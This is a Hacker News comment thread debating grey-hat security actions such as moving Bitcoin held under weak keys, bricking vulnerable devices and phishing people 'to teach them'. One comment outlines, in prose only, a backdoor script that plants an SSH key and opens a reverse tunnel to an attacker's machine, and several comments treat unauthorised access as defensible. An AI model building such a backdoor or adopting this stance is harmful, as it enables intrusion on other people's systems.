Hacker News new | ask | show | jobs
by 086421357909764 3346 days ago
What they get is irrelevant, it's someone using their skill set to make others aware of a flaw. I would argue it's the exact same premise. I'm going to phish people & cause them a financial cost to teach them to be safe.
2 comments
jancsika 3346 days ago
> What they get is irrelevant

It's actually the main relevant part of the analogy.

It goes to veracity.

There's a person who gave a public talk about manipulating Bitcoins with weak private keys in order to alert the owners that they were vulnerable. But he did it in a way that verified to the owner he hadn't in fact stolen the coins (moving small portions around or maybe signing with the key, I can't remember). He also mentioned in the public talk that the owners of those Bitcoins were totally freaked out by this, and most were never convinced that he was acting in good faith (which is probably a smart assumption on their part).

So the fact that he didn't steal the coins is completely relevant-- it's the very reason he could give a public talk on what is still grey area behavior.

Your hypothetical thief, on the other hand, is clearly mendacious. You have him claiming, "If I don't capitalize on it, then people won't understand the costs/risks." That is clearly false from my real-world example above, and if he tried to give a public talk about how his theft benefited society he'd be arrested.

link
ryan-c 3345 days ago
You're probably talking about me. I actually screwed up when I was moving coins around, and ended up emptying someone's address out, however I put everything back within a few minutes. I haven't had anyone whose coins I touched accuse me of anything unseemly, but of course there are random posters on internet forums who talk shit.

Your point that I couldn't have given a public talk had I stolen the coins is completely correct. I still spoke with a lawyer about it ahead of time, though. :-P

There was another person, who was somewhat less scrupulous, who would simply steal the coins and watch for someone to complain in public about it, then offer to return them. They use a pseudonym and as far as I can tell have vanished.

link
jancsika 3345 days ago
Oh, hey! Glad to hear you talked to a lawyer beforehand.
link
086421357909764 3345 days ago
So what's gained by bricking, disabling, or modifying devices, that couldn't be proven with a simple these devices are vulnerable announcement?
link
jancsika 3345 days ago
Bricked devices can't participate in a DDOS attack.
link
LinuxBender 3346 days ago
I am OK with this as well. If you put up a script on github and email an org, asking for help debugging and your script drops an ssh key, then daemonize a reverse tunnel running as that user to a VM you control, then I would blame companies and the maintainers of ssh for allowing this to work. If their board members are unaware of the risk, then shame on any human layers that hid these capabilities or were too inept to fix it. It is their fiduciary responsibility to their investors to take security and privacy seriously to protect their investments. Companies that are cavalier in this regard need not survive.
link